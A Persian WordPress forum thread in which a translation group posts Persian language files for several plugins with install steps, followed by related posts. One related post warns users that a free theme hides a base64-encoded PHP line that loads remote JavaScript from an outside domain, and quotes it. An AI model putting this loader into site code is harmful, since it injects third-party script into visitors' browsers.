مرتضی نظری

دریافت پروژه های گروه فارسی ساز وردپرس پارسی

5 پست در این موضوع قرار دارد

با سلام،طی اجازه ای که مرتضی عزیز به من داده اند،میتونیم از این پس فایل های mo رو به دوستانی که به اون نیاز دارند بدیم.از این پس تمامی پروژه هایی که صد درصد کامل شده اند در اینجا قرار میگیرند.(بعضی از پروژه ها متشکل از چندین پروژه هستند که هرگاه همه پروژه ها اتمام رسیدند یکجا قرار میگیرند.)

این تایپیک رو تنها جهت قرار دادن پروژه ها ایجاد کردم.سوال های احتمالی در یک جای دیگه ارسال بشه...

سرپرست گروه ترجمه : مرتضی نظری

به اشتراک گذاری این پست

لینک به پست

wpseo.jpg

شماره پروژه : 1

نام پروژه: وردپرس سئو

نوع: فایل زبان

خانه افزونه: در مخزن افزونه های وردپرس

ترجمه از: گروه ترجمه وردپرس پارسی

زبان فایل: فارسی

قابلیت نوشتن: خیر

فرمت فایل: mo

نحوه استفاده از فایل زبان: فایل زبان را از حالت فشرده در اورده،سپس در پوشه languages افزونه قرار میدهیم.در این صورت اگر زبان وردپرس شما فارسی باشد،افزونه نیز به زبان فارسی اجرا خواهد شد.

فایل زبان: wordpress-seo-fa_IR.rar

به اشتراک گذاری این پست

لینک به پست

wptotalhack.jpg

شماره پروژه : 2

نام پروژه: وردپرس توتال هک

نوع: فایل زبان

خانه افزونه: در مخزن افزونه های وردپرس

زبان فایل: فارسی

نحوه استفاده از فایل زبان: فایل زبان را از حالت فشرده در اورده،سپس در پوشه languages افزونه قرار میدهیم.در این صورت اگر زبان وردپرس شما فارسی باشد،افزونه نیز به زبان فارسی اجرا خواهد شد.

wp-total-hacks-fa_IR.zip

به اشتراک گذاری این پست

لینک به پست

gantry.jpg

شماره پروژه : 3

نام پروژه : فروم ورک گانتری

نوع فایل: زبان

خانه افزونه: در سایت افزونه

زبان فایل : فارسی

Gantry Framework.rar

به اشتراک گذاری این پست

لینک به پست

دوستان سوالات رو در تاپیک جدا مطرح کنید

باتشکر

به اشتراک گذاری این پست

لینک به پست
مهمان
این موضوع برای عدم ارسال قفل گردیده است.

• مطالب مشابه

• توسط maryam300
      سلام به دوستان
      چطور می تونم کاری کنم که فقط اعضای خبرنامه پیامکی ام بتونند دانلود کنند و همچنین قسمتی از متن رو مشاهده کنند. و کسانی که عضو نباشند نتونند دانلود کنند یا اون قسمت مشخص براشون مخفی باشه.
      خلاصه دو کار:
      1-دانلود ویژه اعضای خبرنامه پیامکی
      2-مشاهده برخی مطالب ویژه اعضای خبرنامه پیامکی
      مرسی
    • توسط mojtabashahi
      امروز قصد دارم دو ضرب المثل را که از "گربه" استفاده کرده اند برای شما یادآوری نمایم. و یک هشدار به کاربران "تازه وارد" وردپرس بدهم.
      1 . گربه را دم حجله باید کشت. سایت : www.dorcel.ir ، باید همین اول جلوی فعالیت چنین سایت هایی گرفته شود.
      2 . هیچ گربه ای محض رضای خدا موش نمی گیرد. داخل فایل های یکی از پوسته هایی که رایگان برای دانلود قرار داده شده کد (انکد base64) زیر وجود دارد : 
      <?php $str = 'PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIHNyYz0naHR0cDovL2JveC5kb3JjZWwuaXIvZG9yY2VsLnBocCc+PC9zY3JpcHQ+'; echo base64_decode($str); که بعد از دیکد می شود : 
      <script type='text/javascript' src='http://box.dorcel.ir/dorcel.php'>  
      پ.ن : ....
    • توسط jahan90
      با سلام 
      بنده یک قالب خریدم از شرایطش نصب افزونه cystat است از سایت بیست اسکریپت دانلود کردم ولی نصب نشد مشکل داشت در اینترنت هم وجود نداشت لطف می کنید یه نسخه ساده و تست شده را برای دانلود بگذارید .ممنون
    • توسط m.m.m
      سلام
      افزونه ای وجود داره که بتونم سایتم را مثل این سایت درس کنم ؟؟

http://alghadir.sch.ir/qbank.aspx

یه چیزی مثل این باشه ینی بشه دسته بندیش کرد و اشخاص بتونن دسته را برای دانلود انتخاب کنن
    • توسط hkss
      سلام . من یک افزونه رو استفاده میکنم و همه ش ترجمه شده اما بازم انگلیسی هست همه متن ها. نمیدونم باید کد فراخوانی رو توی کدوم فایل افزونه و به چه صورت قرار بدم. یه جایی از افزونه که خودش توابع ترجمه رو داده ، شاخص رو اینطوری تعریف کرده $td حالا من نمیدونم کد فراخوان رو به چه صورت قرار بدم و کجا؟! و اینکه فایل زبان رو اگر fa_IR بزارم درسته یا نه؟ مرسی از کمکتون